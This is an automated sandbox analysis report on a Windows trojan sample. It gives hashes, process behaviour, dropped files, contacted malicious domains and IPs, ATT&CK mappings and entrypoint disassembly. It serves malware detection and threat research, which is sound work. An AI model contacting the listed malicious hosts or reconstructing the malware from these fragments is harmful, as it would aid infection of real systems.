Play interactive tour

Edit tour

Windows Analysis Report 3fVvJyTvQU

Overview

General Information

Sample Name:	3fVvJyTvQU (renamed file extension from none to exe)
Analysis ID:	458975
MD5:	4003498f5c38cf05a71125d4e8745791
SHA1:	5bf2e49a13c64f3f65c0b8ef8a61f8202cde5359
SHA256:	ad5711a5bdcd7c6334389a2ed722e16e774d8f55737e85f57c71ec3e1767c63b
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Creates processes via WMI

Contains functionality to dynamically determine API calls

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

3fVvJyTvQU.exe (PID: 5440 cmdline: 'C:\Users\user\Desktop\3fVvJyTvQU.exe' MD5: 4003498F5C38CF05A71125D4E8745791)

conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

3fVvJyTvQU.exe (PID: 5956 cmdline: 'C:\Users\user\Desktop\3fVvJyTvQU.exe' -a MD5: 4003498F5C38CF05A71125D4E8745791)

conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: google.vrthcobj.com

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\sqlite.dll

Virustotal: Detection: 13%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: 3fVvJyTvQU.exe	Virustotal: Detection: 31%			Perma Link
Source: 3fVvJyTvQU.exe	ReversingLabs: Detection: 48%

Source: 3fVvJyTvQU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 172.67.146.70:443 -> 192.168.2.3:49712 version: TLS 1.2

Source:

Binary string: D:\Administrator\Desktop\Qt5\Release\Qt5WebSockets.pdb source: 3fVvJyTvQU.exe, 00000003.00000003.214893639.0000000000640000.00000004.00000001.sdmp, sqlite.dll.3.dr

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 1948 DNS zone transfer UDP 192.168.2.3:57569 -> 34.97.69.225:53

Source: Joe Sandbox View

IP Address: 172.67.146.70 172.67.146.70

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: unknown

DNS traffic detected: queries for: a.goatgame.co

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 172.67.146.70:443 -> 192.168.2.3:49712 version: TLS 1.2

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

Code function: 0_2_004048ED

0_2_004048ED

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\sqlite.dll 7250A8A1B98D09BE823CD6EFD30D85E5418DFC3541D220BB0694DFCC547478BD

Source: 3fVvJyTvQU.exe, 00000000.00000000.199853055.000000000040E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLicenseHelper.exe> vs 3fVvJyTvQU.exe
Source: 3fVvJyTvQU.exe, 00000000.00000002.203152076.0000000002300000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 3fVvJyTvQU.exe
Source: 3fVvJyTvQU.exe, 00000000.00000002.203209704.0000000002360000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 3fVvJyTvQU.exe
Source: 3fVvJyTvQU.exe, 00000000.00000002.203209704.0000000002360000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 3fVvJyTvQU.exe
Source: 3fVvJyTvQU.exe, 00000003.00000002.216402889.000000000040E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLicenseHelper.exe> vs 3fVvJyTvQU.exe
Source: 3fVvJyTvQU.exe, 00000003.00000002.216710496.00000000021D0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewinhttp.dll.muij% vs 3fVvJyTvQU.exe
Source: 3fVvJyTvQU.exe, 00000003.00000003.214893639.0000000000640000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameQt5Gui.dll( vs 3fVvJyTvQU.exe
Source: 3fVvJyTvQU.exe, 00000003.00000002.216651961.0000000002080000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs 3fVvJyTvQU.exe
Source: 3fVvJyTvQU.exe, 00000003.00000002.216658689.0000000002090000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs 3fVvJyTvQU.exe
Source: 3fVvJyTvQU.exe, 00000003.00000002.216698116.00000000021B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 3fVvJyTvQU.exe
Source: 3fVvJyTvQU.exe, 00000003.00000002.216702455.00000000021C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 3fVvJyTvQU.exe
Source: 3fVvJyTvQU.exe	Binary or memory string: OriginalFilenameLicenseHelper.exe> vs 3fVvJyTvQU.exe

Source: 3fVvJyTvQU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal76.winEXE@5/2@3/1

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

Code function: 0_2_00401050 lstrcatW,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,SysAllocString,SysAllocString,SysAllocString,SysAllocString,lstrlenW,lstrlenW,VariantClear,VariantClear,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,VariantClear,VariantClear,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

0_2_00401050

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_01

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

File created: C:\Users\user\AppData\Local\Temp\sqlite.dat

Jump to behavior

Source: 3fVvJyTvQU.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\3fVvJyTvQU.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 3fVvJyTvQU.exe	Virustotal: Detection: 31%
Source: 3fVvJyTvQU.exe	ReversingLabs: Detection: 48%

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

File read: C:\Users\user\Desktop\3fVvJyTvQU.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\3fVvJyTvQU.exe 'C:\Users\user\Desktop\3fVvJyTvQU.exe'
Source: C:\Users\user\Desktop\3fVvJyTvQU.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3fVvJyTvQU.exe	Process created: C:\Users\user\Desktop\3fVvJyTvQU.exe 'C:\Users\user\Desktop\3fVvJyTvQU.exe' -a
Source: C:\Users\user\Desktop\3fVvJyTvQU.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3fVvJyTvQU.exe	Process created: C:\Users\user\Desktop\3fVvJyTvQU.exe 'C:\Users\user\Desktop\3fVvJyTvQU.exe' -a	Jump to behavior

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source:

Binary string: D:\Administrator\Desktop\Qt5\Release\Qt5WebSockets.pdb source: 3fVvJyTvQU.exe, 00000003.00000003.214893639.0000000000640000.00000004.00000001.sdmp, sqlite.dll.3.dr

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

Code function: 0_2_004018A0 LoadLibraryA,GetProcAddress,ShellExecuteExW,

0_2_004018A0

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

Code function: 0_2_00406590 push eax; ret

0_2_004065BE

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

File created: C:\Users\user\AppData\Local\Temp\sqlite.dll

Jump to dropped file

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite.dll

Jump to dropped file

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe TID: 5328	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\3fVvJyTvQU.exe TID: 5888	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

Code function: 0_2_004018A0 LoadLibraryA,GetProcAddress,ShellExecuteExW,

0_2_004018A0

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe	Code function: 0_2_004053C2 SetUnhandledExceptionFilter,		0_2_004053C2
Source: C:\Users\user\Desktop\3fVvJyTvQU.exe	Code function: 0_2_004053B0 SetUnhandledExceptionFilter,		0_2_004053B0

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

Process created: C:\Users\user\Desktop\3fVvJyTvQU.exe 'C:\Users\user\Desktop\3fVvJyTvQU.exe' -a

Jump to behavior

Source: C:\Users\user\Desktop\3fVvJyTvQU.exe

Code function: 0_2_0040267E EntryPoint,GetVersion,GetCommandLineA,

0_2_0040267E

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection11	Virtualization/Sandbox Evasion1	OS Credential Dumping	Security Software Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection11	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
3fVvJyTvQU.exe	32%	Virustotal		Browse
3fVvJyTvQU.exe	48%	ReversingLabs	Win32.Trojan.Sabsik

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\sqlite.dll	14%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\sqlite.dll	15%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
google.vrthcobj.com	8%	Virustotal		Browse
a.goatgame.co	2%	Virustotal		Browse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
google.vrthcobj.com	34.97.69.225	true	true	8%, Virustotal, Browse	unknown
a.goatgame.co	172.67.146.70	true	false	2%, Virustotal, Browse	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.146.70	a.goatgame.co	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458975
Start date:	03.08.2021
Start time:	23:41:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	3fVvJyTvQU (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.winEXE@5/2@3/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 93.6%) Quality average: 79.3% Quality standard deviation: 29%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 40.88.32.150 Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, watson.telemetry.microsoft.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:42:11	API Interceptor	4x Sleep call for process: 3fVvJyTvQU.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.67.146.70	TMB1fxNaqR.exe	Get hash	malicious	Browse
	LRios3pM39.exe	Get hash	malicious	Browse
	85d8c.exe	Get hash	malicious	Browse
	QfVER41Fwx.exe	Get hash	malicious	Browse
	O3h9kRdG7d.exe	Get hash	malicious	Browse
	1A263B2603212FF1E492D9E0C718F12601789E27EAABA.exe	Get hash	malicious	Browse
	U7HCBc2SVy.exe	Get hash	malicious	Browse
	76xAf6BYg8.exe	Get hash	malicious	Browse
	E4lwAiXNCE.exe	Get hash	malicious	Browse
	pLF8TJmHlD.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
google.vrthcobj.com	TMB1fxNaqR.exe	Get hash	malicious	Browse	34.97.69.225
	LRios3pM39.exe	Get hash	malicious	Browse	34.97.69.225
	85d8c.exe	Get hash	malicious	Browse	34.97.69.225
	QfVER41Fwx.exe	Get hash	malicious	Browse	34.97.69.225
	93ejLcdBh5.exe	Get hash	malicious	Browse	34.97.69.225
	k2VFD3gNGE.exe	Get hash	malicious	Browse	34.97.69.225
	MIN56KgzBN.exe	Get hash	malicious	Browse	34.97.69.225
	U7HCBc2SVy.exe	Get hash	malicious	Browse	34.97.69.225
	TIoFSlDlv6.exe	Get hash	malicious	Browse	34.97.69.225
	76xAf6BYg8.exe	Get hash	malicious	Browse	34.97.69.225
	E4lwAiXNCE.exe	Get hash	malicious	Browse	34.97.69.225
	pLF8TJmHlD.exe	Get hash	malicious	Browse	34.97.69.225
	sonia_6.exe	Get hash	malicious	Browse	34.97.69.225
	5H4iRfY1ek.exe	Get hash	malicious	Browse	34.97.69.225
	Copy.exe	Get hash	malicious	Browse	34.97.69.225
	pMVkvSyeIy.exe	Get hash	malicious	Browse	34.97.69.225
	w7pR0EOMwd.exe	Get hash	malicious	Browse	34.97.69.225
	BoLQVCmIZB.exe	Get hash	malicious	Browse	34.97.69.225
	DhWFvSKvSb.exe	Get hash	malicious	Browse	34.97.69.225
	U2HHCJvDj4.exe	Get hash	malicious	Browse	34.97.69.225
a.goatgame.co	TMB1fxNaqR.exe	Get hash	malicious	Browse	172.67.146.70
	LRios3pM39.exe	Get hash	malicious	Browse	172.67.146.70
	85d8c.exe	Get hash	malicious	Browse	104.21.79.144
	85d8c.exe	Get hash	malicious	Browse	172.67.146.70
	QfVER41Fwx.exe	Get hash	malicious	Browse	172.67.146.70
	O3h9kRdG7d.exe	Get hash	malicious	Browse	172.67.146.70
	puzlXYxqKK.exe	Get hash	malicious	Browse	104.21.79.144
	k2VFD3gNGE.exe	Get hash	malicious	Browse	104.21.79.144
	MIN56KgzBN.exe	Get hash	malicious	Browse	104.21.79.144
	U7HCBc2SVy.exe	Get hash	malicious	Browse	172.67.146.70
	TIoFSlDlv6.exe	Get hash	malicious	Browse	104.21.79.144
	76xAf6BYg8.exe	Get hash	malicious	Browse	172.67.146.70
	E4lwAiXNCE.exe	Get hash	malicious	Browse	172.67.146.70
	pLF8TJmHlD.exe	Get hash	malicious	Browse	172.67.146.70
	sonia_6.exe	Get hash	malicious	Browse	104.21.79.144

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	TMB1fxNaqR.exe	Get hash	malicious	Browse	172.67.146.70
	LRios3pM39.exe	Get hash	malicious	Browse	172.67.146.70
	State Settlement Copy.html	Get hash	malicious	Browse	172.67.75.3
	Request Quotation.exe	Get hash	malicious	Browse	172.67.188.154
	invoice.vbs	Get hash	malicious	Browse	162.159.130.233
	kKZZ0J8y0c.exe	Get hash	malicious	Browse	104.21.19.200
	RFQ 29.exe	Get hash	malicious	Browse	104.21.19.200
	ATT80307.HTM	Get hash	malicious	Browse	104.16.19.94
	2C.TA9.HTML	Get hash	malicious	Browse	104.18.11.207
	Dosusign_Na_Sign.htm	Get hash	malicious	Browse	172.67.145.176
	RoyalMail_Requestform0729.exe	Get hash	malicious	Browse	172.67.188.154
	sbcss_Richard.DeNava_#inv0549387TWQYqzTPaYeqvaYMnpdIfJAwwzbguzauViQVRRplvOktNmAire.HTM	Get hash	malicious	Browse	104.16.18.94
	Fake.HTM	Get hash	malicious	Browse	104.16.19.94
	RoyalMail_Requestform1.exe	Get hash	malicious	Browse	172.67.188.154
	Nouveau bon de commande. 3007021_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	MFS0175, MFS0117 MFS0194.exe	Get hash	malicious	Browse	172.67.188.154
	ORIGINAL PROFORMA INVOICE COAU7220898130,PDF.exe	Get hash	malicious	Browse	172.67.176.89
	Purchase Requirements.exe	Get hash	malicious	Browse	23.227.38.74
	items.doc	Get hash	malicious	Browse	104.21.19.200
	ZI09484474344.exe	Get hash	malicious	Browse	104.21.49.41

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	TMB1fxNaqR.exe	Get hash	malicious	Browse	172.67.146.70
	LRios3pM39.exe	Get hash	malicious	Browse	172.67.146.70
	24um7vU1BD.exe	Get hash	malicious	Browse	172.67.146.70
	JQ2bNBDOcO.exe	Get hash	malicious	Browse	172.67.146.70
	Dpwipnj1gx.exe	Get hash	malicious	Browse	172.67.146.70
	19G1ZLyqr2.exe	Get hash	malicious	Browse	172.67.146.70
	ULylDR5F36.exe	Get hash	malicious	Browse	172.67.146.70
	SecuriteInfo.com.W32.AIDetect.malware2.26285.exe	Get hash	malicious	Browse	172.67.146.70
	banload.msi	Get hash	malicious	Browse	172.67.146.70
	yQShMhZ7Hi.exe	Get hash	malicious	Browse	172.67.146.70
	zW4oE2ASRB.exe	Get hash	malicious	Browse	172.67.146.70
	run.exe	Get hash	malicious	Browse	172.67.146.70
	RNrtE1qOSL.exe	Get hash	malicious	Browse	172.67.146.70
	hDJzf1oo7U.exe	Get hash	malicious	Browse	172.67.146.70
	hpDcwMoScr.exe	Get hash	malicious	Browse	172.67.146.70
	JGJtVyC9dr.exe	Get hash	malicious	Browse	172.67.146.70
	QqcQ1EteWS.exe	Get hash	malicious	Browse	172.67.146.70
	Ya50avl5OT.exe	Get hash	malicious	Browse	172.67.146.70
	8xCetBLoAt.exe	Get hash	malicious	Browse	172.67.146.70
	7xt9iOfzN2.exe	Get hash	malicious	Browse	172.67.146.70

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\sqlite.dll	TMB1fxNaqR.exe	Get hash	malicious	Browse
	LRios3pM39.exe	Get hash	malicious	Browse
	CyLELjM5zk.exe	Get hash	malicious	Browse
	setup_x86_x64_install.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\sqlite.dat Download File
Process:	C:\Users\user\Desktop\3fVvJyTvQU.exe
File Type:	data
Category:	dropped
Size (bytes):	578665
Entropy (8bit):	7.9654519561375405
Encrypted:	false
SSDEEP:	12288:811ticqWIMMXa2ad3KNj8++VUYgokNxcg8aVg1gKtY7SQ0O:YPeBaRKNjdklalbVygKtY7xX
MD5:	9AB1B7EC387DAE76B10ADE9CEE9F7E16
SHA1:	C88CE8EF04C2A34890F91D2A908053C56FE49349
SHA-256:	90C8B4423A96315412C7B28E242F8A83B2F805DE631B4F852621EA73BA11C42E
SHA-512:	8EAF5E21F3150884101636B04DA11DCDD1009B321D0E858B382012362F538B8D43FC56AC7EF06CA40B44DA809E7D294C1812200A3FB7231AE1ED07494E6E6A8A
Malicious:	false
Reputation:	low
Preview:	.<..Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V...)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..jj.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2\|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i\|..y.Q'....k...}FT.X.jY..Y....o......y..=\|6..%..z/........s....>.j.-s.k../.:..........>\|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...\|/h..jfDX.S...`&...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^.......aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./

C:\Users\user\AppData\Local\Temp\sqlite.dll Download File
Process:	C:\Users\user\Desktop\3fVvJyTvQU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	81408
Entropy (8bit):	6.295064838876099
Encrypted:	false
SSDEEP:	1536:jkOh0YR+kfbE+2AJk64OceTbkS9Co5sWzcdSzEdY+wJpxpbcNop//:jkcjHY+fJhPN9H2SIdY+wJpxpQ8//
MD5:	05250AA12AD3C6A86DAB6DAB708D17FF
SHA1:	E41AD72C9A43070BB11FD7411800F71DDDF6BDD8
SHA-256:	7250A8A1B98D09BE823CD6EFD30D85E5418DFC3541D220BB0694DFCC547478BD
SHA-512:	A56DF11AF5243150753154E1CBA74E3CDD0CDECF09269B88A3944AC12B73DE59909CE6DBBBD3B1B6DA691D144FAC2599645B2017F66BAC64A106437168EC38C8
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 14%, Browse Antivirus: ReversingLabs, Detection: 15%
Joe Sandbox View:	Filename: TMB1fxNaqR.exe, Detection: malicious, Browse Filename: LRios3pM39.exe, Detection: malicious, Browse Filename: CyLELjM5zk.exe, Detection: malicious, Browse Filename: setup_x86_x64_install.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..f.x.5.x.5.x.5..r5.x.5..p5dx.5..q5.x.5@..4.x.5@..4.x.5@..4.x.5...5.x.5.x.5Jx.5...4.x.5...4.x.5..\|5.x.5...4.x.5Rich.x.5........................PE..L...f@.a...........!................8........................................p............@..........................&..L...<'..(....P.......................`...... ...p...................0...........@............................................text...M........................... ..`.rdata...].......^..................@..@.data........0....... ..............@....rsrc........P.......(..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	4.57901861732841
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3fVvJyTvQU.exe
File size:	57344
MD5:	4003498f5c38cf05a71125d4e8745791
SHA1:	5bf2e49a13c64f3f65c0b8ef8a61f8202cde5359
SHA256:	ad5711a5bdcd7c6334389a2ed722e16e774d8f55737e85f57c71ec3e1767c63b
SHA512:	e603139a756496abbd867c619ad31a7bed73e8b6f789982d5d4d8fc3a444d3dbd6dd6a6b2aa109f6e1d3ceb6ecc1546987f4379f5ca36f71f360a793c4eb4ff1
SSDEEP:	768:zQR+JJlY3yGJxNojkTnJI6TWzzejkZy/xbD9BxufhqXKCl3G9:nAoITdT0Zy5bZXYml3G9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../Q..N?..N?..N?.CF`..N?..l4..N?.NR1..N?..h4..N?..h5..N?.NFb..N?..N>..N?..m...N?.Rich.N?.........PE..L....E.a.................p.

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40267e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x610745D0 [Mon Aug 2 01:09:36 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2cdeda7a0aa27475a825e9c41d4d95f0

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00408150h
push 00403E38h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 10h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [00408050h]
xor edx, edx
mov dl, ah
mov dword ptr [0040CF70h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [0040CF6Ch], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [0040CF68h], ecx
shr eax, 10h
mov dword ptr [0040CF64h], eax
push 00000001h
call 00007FA9F0C4619Bh
pop ecx
test eax, eax
jne 00007FA9F0C44AAAh
push 0000001Ch
call 00007FA9F0C44B50h
pop ecx
call 00007FA9F0C45603h
test eax, eax
jne 00007FA9F0C44AAAh
push 00000010h
call 00007FA9F0C44B3Fh
pop ecx
and dword ptr [ebp-04h], 00000000h
call 00007FA9F0C45E43h
call dword ptr [0040804Ch]
mov dword ptr [0040D658h], eax
call 00007FA9F0C45D01h
mov dword ptr [0040CF54h], eax
call 00007FA9F0C45AAAh
call 00007FA9F0C459ECh
